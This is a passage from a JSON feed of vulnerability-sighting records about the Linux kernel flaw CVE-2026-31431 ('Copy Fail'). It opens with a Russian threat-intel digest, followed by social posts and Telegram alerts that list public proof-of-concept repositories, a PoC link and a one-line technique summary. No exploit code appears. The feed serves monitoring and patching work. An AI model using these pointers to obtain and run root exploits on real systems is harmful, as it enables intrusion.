\u041f\u0440\u0438\u043c\u0430\u043d\u043a\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0436\u0435\u0440\u0442\u0432\u0430\u043c \u0412\u041f\u041e, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0435 \u043d\u0430 Rust.\n\n\ud83d\udd35 APT MuddyWater/Seedworm \u0432 \u0440\u044f\u0434\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b\u0430 \u0448\u0438\u0440\u043e\u043a\u043e\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a Chaos. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0447\u0438\u0442\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u0442\u043e \u2014 \u043e\u0442\u0432\u043b\u0435\u043a\u0430\u044e\u0449\u0438\u0439 \u043c\u0430\u043d\u0451\u0432\u0440 \u0434\u043b\u044f \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438.\n\n\ud83d\udd35 \u041e\u0431\u0437\u043e\u0440 \u0442\u0435\u0445\u043d\u0438\u043a, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u044b\u0445 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u043c VoidStealer \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f application-bound encryption \u0438 \u043a\u0440\u0430\u0436\u0438 \u043a\u0443\u043a\u0438 \u0432 Chrome, Edge \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u0445 \u043d\u0430 \u0431\u0430\u0437\u0435 Chromium.\n\n\ud83d\udfe3 \u0410\u043d\u0430\u043b\u0438\u0437 PamDOORa \u2014 Linux\u2011\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u043e\u0441\u0442\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 PAM\u2011\u043c\u043e\u0434\u0443\u043b\u044c, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0438\u0439 SSH\u2011\u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e \u00ab\u043c\u0430\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c\u0443\u00bb \u043f\u0430\u0440\u043e\u043b\u044e \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c\u0443 TCP\u2011\u043f\u043e\u0440\u0442\u0443, \u043f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0431\u0438\u0440\u0430\u044f \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043f\u0440\u043e\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u0445\u043e\u0441\u0442. \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u043e\u0434\u0430\u0451\u0442\u0441\u044f \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445.\n\n\ud83d\udfe3 \u041e\u0442\u0447\u0451\u0442 \u043e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 AitM, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0432\u0448\u0435\u0439 \u0431\u043e\u043b\u0435\u0435 13000 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u0432 26 \u0441\u0442\u0440\u0430\u043d\u0430\u0445. \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0442\u0435\u043c\u0443 \u00ab\u043f\u0440\u0430\u0432\u0438\u043b \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f\u00bb (code of conduct). \n\n\ud83d\udfe3\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 IAM\u2011\u043a\u043b\u044e\u0447\u0438 \u0441\u043b\u0443\u0436\u0431 AWS, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0442\u0435\u043a\u043b\u0438 \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u044b. \u042d\u0442\u0438 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433 \u0438 \u043f\u0438\u0441\u044c\u043c\u0430 BEC \u0447\u0435\u0440\u0435\u0437 Amazon Simple Email Service. \u041f\u0438\u0441\u044c\u043c\u0430, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0438\u0437 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b AWS, \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0440\u043e\u0445\u043e\u0434\u044f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 SPF, DKIM \u0438 DMARC.\n\n\u2757\ufe0f \u0412\u0434\u043e\u0433\u043e\u043d\u043a\u0443 \u043a \u043e\u043f\u0430\u0441\u043d\u043e\u0439 Linux-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CopyFail (CVE-2026-31431), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0434\u043e root. Dirty Frag (CVE-2026-43284 \u0438 \u201143500) \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0436\u0435 \u0434\u043d\u044f \u0441\u043d\u0430\u0431\u0436\u0451\u043d \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c PoC \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430  Ubuntu, RHEL, CentOS Stream, AlmaLinux, openSUSE, Tumbleweed \u0438 Fedora.\n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #APT #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2026-05-12T08:01:15.000000Z"}, {"uuid": "1c959e4f-d3ee-4d04-b85a-cccec7c1e91a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mudkip.indieweb.social.ap.brid.gy/post/3mlngrwr52d72", "content": "52Pok\u00e9 is down for about 1 hours due to @hetzner volume maintenance \"due to a critical software update\". I guess it's CVE-2026-31431?", "creation_timestamp": "2026-05-12T09:07:09.800781Z"}, {"uuid": "a629059f-72b1-46f0-ac87-e909c4d594a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/diesec.bsky.social/post/3mlnn3z4pox2j", "content": "732 bytes of Python \u2192 root on every Linux server you own. CVE-2026-31431 works on Ubuntu, RHEL, Debian, SUSE \u2014 no timing windows, no recompilation. CISA deadline May 15. Patch now.\n\n#Linux #CVE202631431 #PatchNow #CISAKEV", "creation_timestamp": "2026-05-12T11:00:05.882905Z"}, {"uuid": "4f2448d9-ad55-425f-9100-018bf0f3195b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/habr_com_news/46381", "content": "7 \u043c\u0430\u044f 2026 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Parrot Security\u00a0\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430\u00a0\u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 Parrot OS 7.2\u00a0\u043d\u0430\u00a0\u0431\u0430\u0437\u0435 Debian 13.4\u00a0Trixie \u0438 \u044f\u0434\u0440\u0430 Linux 6.19.13 \u0441 \u043f\u0430\u0442\u0447\u0435\u043c \u043f\u0440\u043e\u0442\u0438\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2026-31431 (Copy Fail). \u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043d\u0430\u00a0\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043e \u0434\u043b\u044f\u00a0\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u0438 \u044d\u0442\u0438\u0447\u043d\u043e\u0433\u043e \u0445\u0430\u043a\u0438\u043d\u0433\u0430. \u0412\u044b\u043f\u0443\u0441\u043a Parrot OS 7.0\u00a0\u0441\u043e\u0441\u0442\u043e\u044f\u043b\u0441\u044f\u00a0\u0432 \u0434\u0435\u043a\u0430\u0431\u0440\u0435 2025 \u0433\u043e\u0434\u0430. \u0421\u0431\u043e\u0440\u043a\u0430 Parrot OS 7.1\u00a0\u0432\u044b\u0448\u043b\u0430\u00a0\u0432 \u0444\u0435\u0432\u0440\u0430\u043b\u0435 2026 \u0433\u043e\u0434\u0430.\n\n#\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0430 #\u041e\u0421", "creation_timestamp": "2026-05-12T11:45:03.000000Z"}, {"uuid": "a6410ea9-604b-440f-9f7e-c1dfc300b6a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83922", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a studiogangster\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-12 10:40:17\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\noen liner CVE-2026-31431 test. Created 'sandbox' on sudo user and tests if ir can escape to root\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-12T11:00:05.000000Z"}, {"uuid": "a84f15b9-d5fc-40e5-a2d0-f1fb64b13a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/9XqhTISUbDUPo_c26c1BEinqDeNjvDc1gYqinuT1sIOuN_4", "content": "", "creation_timestamp": "2026-05-11T09:00:05.000000Z"}, {"uuid": "c9652605-107b-4f10-b4d1-b0096270f9e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83946", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Smarttfoxx\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 7  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 4\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-12 10:13:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 (Copy Fail) PoC - Linux kernel page cache corruption via authencesn AF_ALG + splice()\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-12T14:00:06.000000Z"}, {"uuid": "36c62ee3-6027-4458-9c58-8b2ec35f5ef7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/88YkBdmMMIAUjkN-cy3WAm2Yboedxaf0GfTYOA3KafU0qTc", "content": "", "creation_timestamp": "2026-05-12T15:00:07.000000Z"}, {"uuid": "da71782e-2792-42ba-8644-8587e4cda304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/mGI2CRHqQCjyvA6ju1XF5IWDLp0GZA5_xrkAMw9kytXRmaE", "content": "", "creation_timestamp": "2026-05-11T03:00:06.000000Z"}, {"uuid": "7af600a8-9b41-454a-ab92-03d1ef2ec4fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/AI07jPDl7IHRtOitWV_PZ0T-XIh1na8tiD4BR5Qz19J-y9I", "content": "", "creation_timestamp": "2026-05-10T03:00:05.000000Z"}, {"uuid": "5202e068-4e32-4803-bc6a-a1e5963a63e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84068", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy-Fail-CVE-2026-31431-Lab\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kuniyal08\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-13 11:36:05\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-13T12:00:04.000000Z"}, {"uuid": "f15bf589-5afd-4724-b9c5-27d90110cf24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/captainsmok3r_official/336", "content": "copy-fail-cve-2026-31431 PoC:\nhttps://github.com/theori-io/copy-fail-CVE-2026-31431", "creation_timestamp": "2026-05-12T20:08:40.000000Z"}, {"uuid": "942609cc-c776-4492-b03d-8458a4d9b5c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mloafgviij2d", "content": "ReversingLabs tracked 163 samples tied to CVE-2026-31431, with activity starting before the embargo break. The Dirty Frag/Copy Fail chain spans ELF, Python, and a malicious PyPI wheel. #DirtyFrag #CopyFail #PyPI", "creation_timestamp": "2026-05-12T16:45:29.155545Z"}, {"uuid": "698e30d4-caa5-4774-be95-41b9de8df8b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83963", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-fix\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a paulorlima9\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-12 15:23:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nQuick mitigation and patch script for CVE-2026-31431 (Copy Fail) on Ubuntu/Debian VPS\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-12T16:00:05.000000Z"}, {"uuid": "2daf94c8-cba5-4c83-9144-15dd580e3332", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T18:00:00.000000Z"}, {"uuid": "c6e810d4-5874-41da-8efd-b9de0d3acb29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlpb3on5ls2s", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 129 interactions\nCVE-2026-43500: 94 interactions\nCVE-2026-31431: 76 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45185: 8 interactions\nCVE-2026-41940: 5 interactions\nCVE-2026-42208: 5 interactions\n", "creation_timestamp": "2026-05-13T02:30:29.367487Z"}, {"uuid": "2c8f0274-f5ec-4fdb-bad9-8c1ad38a574d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116564950057858680", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:https://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:01.960257Z"}, {"uuid": "e5ad379d-e908-40b1-956c-332e28f9828f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mlpbmfkh4vz2", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:\nhttps://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:11.329049Z"}, {"uuid": "725775ed-e0b8-4b9e-961c-22145148f9cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/n0vedad/1a9700a74e76fb982fe5788147bf0484", "content": "", "creation_timestamp": "2026-05-13T09:47:14.000000Z"}, {"uuid": "b65ad0df-ff29-4460-a6a1-15a949d27ee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/gmqsYJuL8AU1ZXxnDjjWQKLCPTC0oBwWP4DJHqZuZarsDHs", "content": "", "creation_timestamp": "2026-05-12T21:00:04.000000Z"}, {"uuid": "ca442c6a-1618-4969-a935-8d22d37113fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84138", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Sebastian294\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-13 23:56:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nAnal\u00edsis - POC - Mitigaci\u00f3n\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-14T00:00:04.000000Z"}, {"uuid": "c48ad875-f73a-4731-8976-572a4a373b1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/AdvisoryICS/statuses/116570458687208466", "content": "New ICSAP Analysis Report out today: \"Reading Between the Advisories.\"\nReviewed 3,800 CISA ICS advisories and 12,468 ICS[AP] vendor advisories for Linux exposure to Copy Fail (CVE-2026-31431).0.8% mention Linux. Schneider, Rockwell, Mitsubishi, Hitachi Energy, Moxa: zero references each across 755 advisories.Advisory text alone won't show asset owners their exposure.\nTLP:CLEAR \u2192 https://drive.google.com/file/d/1CDvyFi3ZcdMewTJmSURRQhEoNVWQI67s/view?usp=sharing\n#OTSecurity #ICSSecurity #CopyFail #CVE202631431 #LinuxKernel #PSIRT", "creation_timestamp": "2026-05-14T02:00:40.580851Z"}, {"uuid": "741ba42e-70be-43ef-958e-fbb74d249b00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlrrkr5rym2j", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 134 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 73 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 14 interactions\nCVE-2026-42945: 7 interactions\nCVE-2025-8088: 6 interactions\n", "creation_timestamp": "2026-05-14T02:30:34.466046Z"}, {"uuid": "9cc82614-3294-49e5-ab84-327237ef0936", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/O41s4ZacceniC-zmRdA20LKtlUfLN8dJaI2Rmc1hsAXigiA", "content": "", "creation_timestamp": "2026-05-13T21:00:04.000000Z"}, {"uuid": "52c8aa3e-42da-48eb-b353-4549d42997be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/no9VrmuWpYCotL5oqRbnMQdNuDYSzv-XRgybXr9t8F_k0Js", "content": "", "creation_timestamp": "2026-05-12T03:00:06.000000Z"}, {"uuid": "17546d4a-dcb3-4883-91dd-e16e5fc503a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/cc4rNasGAf6eBRoD2kZTJIxW5lr85DmN8AZG7mw1GXsUUwc", "content": "", "creation_timestamp": "2026-05-13T15:00:06.000000Z"}, {"uuid": "d17b51b6-1b8b-49c5-afd5-e6a40b269edf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/6_gD9pQtVCg_eRlU_-Eqvw6JM83wq5C4Rc0rf2uF-yzttPU", "content": "", "creation_timestamp": "2026-05-13T09:00:04.000000Z"}, {"uuid": "9c189a4f-8336-468c-9848-8b4342dd8d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84190", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-CopyFail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 0xFuffM3\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-14 09:16:48\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-14T10:00:04.000000Z"}, {"uuid": "8d8acb96-b566-4341-9898-4b6daea3796e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": 